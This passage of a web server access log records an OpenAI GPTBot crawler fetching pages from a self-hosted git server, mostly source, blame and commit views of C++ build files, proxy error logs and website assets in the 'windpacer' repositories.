192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png" -[17/Feb/2026:15:49:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png" -[17/Feb/2026:15:49:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 14423] [Gzip 4.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" -[17/Feb/2026:15:49:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 27991] [Gzip 9.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" -[17/Feb/2026:15:49:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 19760] [Gzip 9.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" -[17/Feb/2026:15:49:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 14003] [Gzip 4.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" -[17/Feb/2026:15:49:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html?display=source" [Client 74.7.227.38] [Length 15742] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html" -[17/Feb/2026:15:49:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html?display=source" [Client 74.7.227.38] [Length 30932] [Gzip 9.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" -[17/Feb/2026:15:49:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11061] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build" -[17/Feb/2026:15:49:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11059] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build" -[17/Feb/2026:15:49:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 16414] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build" -[17/Feb/2026:15:49:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11620] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:49:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10635] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build" -[17/Feb/2026:15:49:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 15203] [Gzip 7.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:15:49:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 33050] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:15:49:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 22997] [Gzip 13.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:15:49:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 14239] [Gzip 6.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:15:49:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 10325] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:15:49:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 10129] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:15:49:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10203] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:49:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10204] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:49:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:15:49:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:49:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:49:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10429] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:49:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10428] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:49:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11046] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:49:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 10303] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:49:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17036] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:49:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17037] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:49:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12945] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:49:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10969] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:49:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11010] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:49:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 10461] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:15:49:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 10323] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:15:49:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11898] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:15:49:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10223] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:15:49:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11900] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:15:49:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10221] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:15:49:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:15:49:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:15:49:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17966] [Gzip 11.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:15:49:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9985] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:15:49:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17963] [Gzip 11.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:15:49:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:15:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:15:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11085] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:49:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:49:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11085] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:49:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:49:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10006] [Gzip 2.85] [Sent-to 192.168.0.250] 